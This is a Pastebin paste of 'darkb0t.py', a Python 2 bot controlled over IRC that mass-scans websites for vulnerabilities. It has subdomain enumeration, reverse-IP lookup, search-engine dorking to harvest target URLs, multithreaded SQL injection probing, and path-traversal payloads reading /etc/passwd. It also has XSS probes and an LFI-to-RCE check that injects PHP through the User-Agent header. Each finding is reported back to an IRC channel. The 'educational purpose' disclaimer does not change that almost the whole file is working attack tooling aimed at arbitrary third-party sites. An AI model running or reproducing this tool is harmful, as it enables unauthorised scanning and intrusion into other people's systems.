API tools faq
paste
Advertisement
mrgobel

dark.py

mrgobel
Jan 7th, 2017
658
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 21.15 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. # This was written for educational purpose and pentest only. Use it at your own risk.
  3. # Author will be not responsible for any damage!
  4. # !!! Special greetz for my friend sinner_01 !!!
  5. # Toolname : darkb0t.py
  6. # Coder : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
  7. # Version : 0.4
  8. # Greetz for rsauron and low1z, great python coders
  9. # greetz for d3hydr8, r45c4l, qk, fx0, Soul, MikiSoft, c0ax, b0ne and all members of ex darkc0de.com, ljuska.org & darkartists.info
  10.  
  11. import sys, subprocess, socket, string, httplib, urlparse, urllib, re, urllib2, random, threading, cookielib
  12. from sgmllib import SGMLParser
  13. from xml.dom.minidom import parse, parseString
  14. from time import sleep
  15.  
  16. try:
  17. set
  18. except NameError:
  19. from sets import Set as set
  20.  
  21.  
  22. def logo():
  23. print "\n|---------------------------------------------------------------|"
  24. print "| Up[@]hacker-newbie[dot]org |"
  25. print "| 02/2012 darkb0t.py v.0.4 |"
  26. print "| By UP |"
  27. print "|---------------------------------------------------------------|\n"
  28.  
  29. def cmd():
  30. print "[!] Commands the bot understands: "
  31. print "\n[+] !help : Help"
  32. print "[+] !usage : Examples of usage"
  33. print "[+] !over : Bot quits"
  34. print "[+] !clear : Clearing the urls in array!"
  35. print "[+] !status : Show status of finished threads"
  36. print "[+] !reverse : List domains hosted on the same IP"
  37. print "[+] !srvinfo : Some info about target server"
  38. print "[+] !sub : Checking for subdomains"
  39. print "[+] !check : Crawl links from target and check for SQLi, LFI, LFI to RCE, XSS"
  40. print "[+] !dork : Using dork for collecting links and then check for SQLi"
  41.  
  42. if sys.platform == 'linux' or sys.platform == 'linux2':
  43. subprocess.call('clear', shell=True)
  44. logo()
  45. cmd()
  46. else:
  47. subprocess.call('cls', shell=True)
  48. logo()
  49. cmd()
  50. if len(sys.argv) != 5:
  51. print "[!] Usage: python darkb0t.py <host> <port> <nick> <channel>"
  52. print "[!] Exiting, thx for using script"
  53. sys.exit(1)
  54.  
  55. subdomains = ['adm','admin','admins','agent','aix','alerts','av','antivirus','app','apps','appserver','archive','as400','auto','backup','banking','bbdd','bbs','bea','beta','blog','catalog','cgi','channel','channels','chat','cisco','client','clients','club','cluster','clusters','code','commerce','community','compaq','conole','consumer','contact','contracts','corporate','ceo','cso','cust','customer','cpanel','data','bd','db2','default','demo','design','desktop','dev','develop','developer','device','dial','digital','dir','directory','disc','discovery','disk','dns','dns1','dns2','dns3','docs','documents','domain','domains','dominoweb','download','downloads','ecommerce','e-commerce','edi','edu','education','email','enable','engine','engineer','enterprise','error','event','events','example','exchange','extern','external','extranet','fax','field','finance','firewall','forum','forums','fsp','ftp','ftp2','fw','fw1','gallery','galleries','games','gateway','gopher','guest','gw','hello','helloworld','help','helpdesk','helponline','hp','ibm','ibmdb','ids','ILMI','images','imap','imap4','img','imgs','info','intern','internal','intranet','invalid','iphone','ipsec','irc','ircserver','jobs','ldap','link','linux','lists','listserver','local','localhost','log','logs','login','lotus','mail','mailboxes','mailhost','management','manage','manager','map','maps','marketing','device','media','member','members','messenger','mngt','mobile','monitor','multimedia','music','my','names','net','netdata','netstats','network','news','nms','nntp','ns','ns1','ns2','ns3','ntp','online','openview','oracle','outlook','page','pages','partner','partners','pda','personal','ph','pictures','pix','pop','pop3','portal','press','print','printer','private','project','projects','proxy','public','ra','radio','raptor','ras','read','register','remote','report','reports','root','router','rwhois','sac','schedules','scotty','search','secret','secure','security','seri','serv','serv2','server','service','services','shop','shopping','site','sms','smtp','smtphost','snmp','snmpd','snort','solaris','solutions','support','source','sql','ssl','stats','store','stream','streaming','sun','support','switch','sysback','system','tech','terminal','test','testing','testing123','time','tivoli','training','transfers','uddi','update','upload','uploads','video','vpn','w1','w2','w3','wais','wap','web','webdocs','weblib','weblogic','webmail','webserver','webservices','websphere','whois','wireless','work','world','write','ws','ws1','ws2','ws3','www1','www2','www3']
  56.  
  57. header = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
  58. 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
  59. 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
  60. 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
  61. 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
  62. 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
  63. 'Microsoft Internet Explorer/4.0b1 (Windows 95)',
  64. 'Opera/8.00 (Windows NT 5.1; U; en)',
  65. 'amaya/9.51 libwww/5.4.0',
  66. 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
  67. 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
  68. 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
  69. 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
  70. 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
  71. 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']
  72.  
  73. sqlerrors = {'MySQL': 'error in your SQL syntax',
  74. 'MiscError': 'mysql_fetch',
  75. 'MiscError2': 'num_rows',
  76. 'Oracle': 'ORA-01756',
  77. 'JDBC_CFM': 'Error Executing Database Query',
  78. 'JDBC_CFM2': 'SQLServer JDBC Driver',
  79. 'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',
  80. 'MSSQL_Uqm': 'Unclosed quotation mark',
  81. 'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
  82. 'MS-Access_JETdb': 'Microsoft JET Database',
  83. 'Error Occurred While Processing Request' : 'Error Occurred While Processing Request',
  84. 'Server Error' : 'Server Error',
  85. 'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error',
  86. 'Invalid Querystring' : 'Invalid Querystring',
  87. 'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC',
  88. 'VBScript Runtime' : 'VBScript Runtime',
  89. 'ADODB.Field' : 'ADODB.Field',
  90. 'BOF or EOF' : 'BOF or EOF',
  91. 'ADODB.Command' : 'ADODB.Command',
  92. 'JET Database' : 'JET Database',
  93. 'mysql_fetch_array()' : 'mysql_fetch_array()',
  94. 'Syntax error' : 'Syntax error',
  95. 'mysql_numrows()' : 'mysql_numrows()',
  96. 'GetArray()' : 'GetArray()',
  97. 'FetchRow()' : 'FetchRow()',
  98. 'Input string was not in a correct format' : 'Input string was not in a correct format',
  99. 'Not found' : 'Not found'}
  100.  
  101. lfis = ["/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../../etc/passwd%00","/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"]
  102.  
  103. xsses = ["<h1>XSS by baltazar</h1>","%3Ch1%3EXSS%20by%20baltazar%3C/h1%3E"]
  104.  
  105. timeout = 300
  106. socket.setdefaulttimeout(timeout)
  107. threads = []
  108. urls = []
  109.  
  110. host = sys.argv[1]
  111. port = int(sys.argv[2])
  112. nick = sys.argv[3]
  113. chan = sys.argv[4]
  114.  
  115. def revip():
  116. sites = [target]
  117. appid = '01CDBCA91C590493EE4E91FAF83E5239FEF6ADFD'
  118. ip = socket.gethostbyname(target)
  119. offset = 50
  120. num = 1
  121. while offset < 300:
  122. url ="/xml.aspx?AppId=%s&Query=ip:%s&Sources=Web&Version=2.0&Market=en-us&Adult=Moderate&Options=EnableHighlighting&Web.Count=50&Web.Offset=%s&Web.Options=DisableQueryAlterations" % (appid, ip, offset)
  123. conn = httplib.HTTPConnection("api.bing.net")
  124. conn.request("GET", url)
  125. res = conn.getresponse()
  126. data = res.read()
  127. conn.close()
  128. xmldoc = parseString(data)
  129. name = xmldoc.getElementsByTagName('web:DisplayUrl')
  130. for n in name:
  131. temp = n.childNodes[0].nodeValue
  132. temp = temp.split("/")[0]
  133. if temp.find('www.') == -1:
  134. sites.append(temp)
  135. offset += 50
  136. print "\n[+] Target: ",target
  137. print "[+] IP: ",ip
  138. print "[+] Reverse IP LookUP ..."
  139. print "[+] Please wait!"
  140. print "[!] Total: ", len(sites), " domain(s)\n"
  141. s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Target: ", target))
  142. s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] IP: ", ip))
  143. s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] Reverse IP LookUp ..."))
  144. s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] Please wait!"))
  145. s.send("PRIVMSG %s :%s%s%s\r\n" % (chan, "[!] Total: ",len(sites), " domain(s)"))
  146. for si in sites:
  147. print "[",num,"/",len(sites),"] http://"+si
  148. s.send("PRIVMSG %s :%s%s%s%s%s%s\r\n" % (chan,"[",num,"/",len(sites),"] http://", si))
  149. sleep(2)
  150. num += 1
  151.  
  152. def srvinfo():
  153. conn = httplib.HTTPConnection(target, 80)
  154. try:
  155. conn.request("HEAD", "/")
  156. except socket.timeout:
  157. print "[-] Server Timeout"
  158. s.send("PRIVMSG %s :%s\r\n" % (chan, "[-] Server Timeout"))
  159. except(KeyboardInterrupt, SystemExit):
  160. pass
  161. r1 = conn.getresponse()
  162. conn.close()
  163. ip = socket.gethostbyname(target)
  164. server = r1.getheader('Server')
  165. xpoweredby = r1.getheader('x-powered-by')
  166. date = r1.getheader('date')
  167. if xpoweredby == None:
  168. print "\n[+] Ip of server: ", ip
  169. print "[+] Server info: ", server
  170. print "[+] Server date: ", date
  171. s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Ip of server: ", ip))
  172. s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Server info: ", server))
  173. s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Server date: ", date))
  174. else:
  175. print "\n[+] Ip of server: ", ip
  176. print "[+] Server info: ", server
  177. print "[+] Xpoweredby: ", xpoweredby
  178. print "[+] Server date: ", date
  179. s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Ip of server: ", ip))
  180. s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Server info: ", server))
  181. s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Xpoweredby: ", xpoweredby))
  182. s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Server date: ", date))
  183.  
  184. def sub():
  185. w00t = 0
  186. print "\n[+] Target: ", domain
  187. s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Target: ", domain))
  188. print "[+] Checking for subdomains\n"
  189. s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] Checking for subdomains"))
  190. for sub in subdomains:
  191. subdomain = sub+'.'+domain
  192. try:
  193. target = socket.gethostbyname(subdomain)
  194. w00t = w00t+1
  195. print subdomain
  196. s.send("PRIVMSG %s :%s\r\n" % (chan, subdomain))
  197. except:
  198. pass
  199. print "[!] Found ",w00t," subdomain(s)\n"
  200. s.send("PRIVMSG %s :%s%s%s\r\n" % (chan, "\n[!] Found ",w00t, " subdomain(s)!"))
  201.  
  202. def SQLi(u):
  203. host = u + "'"
  204. try:
  205. source = urllib2.urlopen(host).read()
  206. for type, eMSG in sqlerrors.items():
  207. if re.search(eMSG, source):
  208. print "[!] w00t,w00t!: ",host," Error: ", type, " ---> SQL Injection"
  209. s.send("PRIVMSG %s :%s%s%s%s%s\r\n" % (chan, "[!] w00t,w00t!: ", host, " Error: ", type, " ---> SQL Injection"))
  210. sleep(2)
  211. else:
  212. pass
  213. except:
  214. pass
  215.  
  216. def lfi_rce(u):
  217. for lfi in lfis:
  218. try:
  219. check = urllib2.urlopen(u+lfi.replace("\n", "")).read()
  220. if re.findall("root:x", check):
  221. print "[!] w00t,w00t!: ",u+lfi, " ---> LFI Found"
  222. s.send("PRIVMSG %s :%s%s%s\r\n" % (chan, "[!] w00t,w00t!: ", u+lfi, " ---> LFI Found"))
  223. sleep(2)
  224. target = u+lfi
  225. target = target.replace("/etc/passwd", "/proc/self/environ")
  226. header = "<? echo md5(baltazar); ?>"
  227. try:
  228. request_web = urllib2.Request(target)
  229. request_web.add_header('User-Agent', header)
  230. text = urllib2.urlopen(request_web)
  231. text = text.read()
  232. if re.findall("f17f4b3e8e709cd3c89a6dbd949d7171", text):
  233. print "[!] w00t,w00t!: ", target, " ---> LFI to RCE Found"
  234. s.send("PRIVMSG %s :%s%s%s\r\n" % (chan, "[!] w00t!,w00t!: ", target, " ---> LFI to RCE Found"))
  235. sleep(2)
  236. except:
  237. pass
  238. except:
  239. pass
  240.  
  241. def xss(u):
  242. for xss in xsses:
  243. try:
  244. source = urllib2.urlopen(u+xss.replace("\n", "")).read()
  245. if re.findall("XSS by baltazar", source):
  246. print "[!] w00t,w00t!: ", u+xss, " ---> XSS found (might be false)"
  247. s.send("PRIVMSG %s :%s%s%s\r\n" % (chan, "[!] w00t!,w00t!: ", u+xss, " ---> XSS found (might be false)"))
  248. except:
  249. pass
  250.  
  251. def search(inurl, maxc):
  252. counter = 0
  253. while counter < int(maxc):
  254. jar = cookielib.FileCookieJar("cookies")
  255. query = inurl+'+site:'+site
  256. results_web = 'http://www.search-results.com/web?q='+query+'&hl=en&page='+repr(counter)+'&src=hmp'
  257. request_web = urllib2.Request(results_web)
  258. agent = random.choice(header)
  259. request_web.add_header('User-Agent', agent)
  260. opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
  261. text = opener_web.open(request_web).read()
  262. stringreg = re.compile('(?<=href=")(.*?)(?=")')
  263. names = stringreg.findall(text)
  264. counter += 1
  265. for name in names:
  266. if name not in urls:
  267. if re.search(r'\(',name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):
  268. pass
  269. elif re.search("google",name) or re.search("youtube", name) or re.search("phpbuddy", name) or re.search("iranhack",name) or re.search("phpbuilder",name) or re.search("codingforums", name) or re.search("phpfreaks", name) or re.search("%", name) or re.search("facebook", name) or re.search("twitter", name):
  270. pass
  271. else:
  272. urls.append(name)
  273.  
  274. tmplist = []
  275. finallist = []
  276. print "[+] Urls collected: ", len(urls)
  277. s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Urls collected: ", len(urls)))
  278. for u in urls:
  279. try:
  280. host = u.split("/", 3)
  281. domain = host[2]
  282. if domain not in tmplist and "=" in u:
  283. finallist.append(u)
  284. tmplist.append(domain)
  285. except:
  286. pass
  287. print "[+] Urls for checking: ",len(finallist);print ""
  288. s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Urls for checking: ", len(finallist)))
  289. return finallist
  290.  
  291. class injThread(threading.Thread):
  292. def __init__(self,hosts):
  293. self.hosts=hosts;self.fcount = 0
  294. self.check = True
  295. threading.Thread.__init__(self)
  296.  
  297. def run (self):
  298. urls = list(self.hosts)
  299. for u in urls:
  300. try:
  301. if self.check == True:
  302. print u
  303. SQLi(u)
  304. else:
  305. break
  306. except(KeyboardInterrupt,ValueError):
  307. pass
  308. self.fcount+=1
  309.  
  310. def stop(self):
  311. self.check = False
  312.  
  313. class URLLister(SGMLParser):
  314. def reset(self):
  315. SGMLParser.reset(self)
  316. self.urls = []
  317.  
  318. def start_a(self, attrs):
  319. href = [v for k, v in attrs if k == 'href']
  320. if href:
  321. self.urls.extend(href)
  322.  
  323. def parse_urls(links):
  324. urls = []
  325. for link in links:
  326. num = link.count("=")
  327. if num > 0:
  328. for x in range(num):
  329. x = x + 1
  330. if link[0] == "/" or link[0] == "?":
  331. u = site+link.rsplit("=",x)[0]+"="
  332. else:
  333. u = link.rsplit("=",x)[0]+"="
  334. if u.find(site.split(".",1)[1]) == -1:
  335. u = site+u
  336. if u.count("//") > 1:
  337. u = "http://"+u[7:].replace("//","/",1)
  338. urls.append(u)
  339. urls = list(set(urls))
  340. return urls
  341.  
  342. ircmsg = ""
  343. s = socket.socket( )
  344. s.connect((host, port))
  345. s.send("NICK %s\r\n" % nick)
  346. s.send("USER %s %s baltazar :%s\r\n" % (nick,nick,nick))
  347. s.send("JOIN :%s\r\n" % chan)
  348.  
  349. while 1:
  350. ircmsg = ircmsg+s.recv(2048)
  351. temp = string.split(ircmsg, "\n")
  352. ircmsg = temp.pop()
  353. for line in temp:
  354. line = string.rstrip(line)
  355. line = string.split(line)
  356. try:
  357. if line[1] == "JOIN":
  358. name = str(line[0].split("!")[0])
  359. s.send("PRIVMSG %s :%s%s\r\n" % (chan, "Welcome, ", name.replace(":","")))
  360. s.send("PRIVMSG %s :%s\r\n" % (chan, "b4ltazar@gmail.com"))
  361. s.send("PRIVMSG %s :%s\r\n" % (chan, "darkb0t.py v.0.4"))
  362. s.send("PRIVMSG %s :%s\r\n" % (chan, "Visit ljuska.org & darkartists.info"))
  363. s.send("PRIVMSG %s :%s\r\n" % (chan, "For help type: !help"))
  364.  
  365. if line[3] == ":!help":
  366. s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] Commands the b0t understands:"))
  367. s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] !help : Help"))
  368. s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] !usage : Examples of usage"))
  369. s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] !over : Bot quits"))
  370. s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] !clear : Clearing the urls in array!"))
  371. s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] !status : Show status of finished threads"))
  372. s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] !reverse : List domains hosted on the same IP"))
  373. s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] !srvinfo : Some info about target server"))
  374. s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] !sub : Checking for subdomains"))
  375. s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] !check : Crawl links from target and check for SQLi, LFI, LFI to RCE, XSS"))
  376. s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] !dork : Using dork for collecting links and then check for SQLi"))
  377.  
  378. if line[3] == ":!usage":
  379. s.send("PRIVMSG %s :%s\r\n" % (chan, "[!] !reverse target.com"))
  380. s.send("PRIVMSG %s :%s\r\n" % (chan, "[!] !srvinfo target.com"))
  381. s.send("PRIVMSG %s :%s\r\n" % (chan, "[!] !sub target.com"))
  382. s.send("PRIVMSG %s :%s\r\n" % (chan, "[!] !check http://www.target.com"))
  383. s.send("PRIVMSG %s :%s\r\n" % (chan, "[!] !dork index.php?id= com 10 10"))
  384.  
  385. if line[3] == ":!over":
  386. s.send("PRIVMSG %s :%s\r\n" % (chan, "[!] darkb0t leaves, visit ljuska.org & darkartists.info"))
  387. print "\n[!] Thx for using darkb0t, visit ljuska.org & darkartists.info"
  388. sys.exit(1)
  389.  
  390. if line[3] == ":!clear":
  391. urls = []
  392. print "\n[!] Array cleared!"
  393. s.send("PRIVMSG %s :%s\r\n" % (chan, "[!] Array cleared!"))
  394.  
  395. if line[3] == ":!status":
  396. mainthread = 0
  397. if threads != []:
  398. for thread in threads:
  399. mainthread += thread.fcount
  400. print "\n[+] Number of threads finished scanning: ", mainthread
  401. s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Number of threads finished scanning: ", mainthread))
  402.  
  403. if line[3] == ":!reverse":
  404. target = line[4]
  405. revip()
  406. if line[3] == ":!srvinfo":
  407. target = line[4]
  408. srvinfo()
  409. if line[3] == ":!sub":
  410. domain = line[4]
  411. sub()
  412. if line[3] == ":!check":
  413. site = line[4]
  414. site = site.replace("http://","").rsplit("/",1)[0]+"/"
  415. site = "http://"+site.lower()
  416. try:
  417. usock = urllib.urlopen(site)
  418. parser = URLLister()
  419. parser.feed(usock.read().lower())
  420. parser.close()
  421. usock.close()
  422. except:
  423. pass
  424. urls = parse_urls(parser.urls)
  425. print "\n[!] Links Found: ", len(urls); print ""
  426. s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[!] Links Found: ", len(urls)))
  427. for u in urls:
  428. try:
  429. print u
  430. SQLi(u)
  431. lfi_rce(u)
  432. xss(u)
  433. except(KeyboardInterrupt, SystemExit):
  434. print "[!] CTRL+C activated, now exiting! Thx for using darkb0t.py!"
  435.  
  436. if line[3] == ":!dork":
  437. inurl = line[4]
  438. site = line[5]
  439. maxc = line[6]
  440. numthreads = line[7]
  441. print "\n[+] Dork: ", inurl
  442. print "[+] Domain: ", site
  443. print "[+] Number of page to search: ", maxc
  444. print "[+] Number of threads: ", numthreads;print""
  445. s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Dork: ", inurl))
  446. s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Domain: ", site))
  447. s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Number of page to search: ", maxc))
  448. s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Number of threads: ", numthreads))
  449. usearch = search(inurl, maxc)
  450. i = len(usearch) / int(numthreads)
  451. m = len(usearch) % int(numthreads)
  452. z = 0
  453. if len(threads) <= numthreads:
  454. for x in range(0, int(numthreads)):
  455. sliced = usearch[x*i:(x+1)*i]
  456. if (z<m):
  457. sliced.append(usearch[int(numthreads)*i+z])
  458. z += 1
  459. thread = injThread(sliced)
  460. thread.start()
  461. threads.append(thread)
  462. for thread in threads:
  463. thread.join()
  464.  
  465.  
  466. except(IndexError):
  467. pass
  468.  
  469. if(line[0] == "PING"):
  470. sleep(1)
  471. s.send("PONG %s\r\n" % line[1])
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!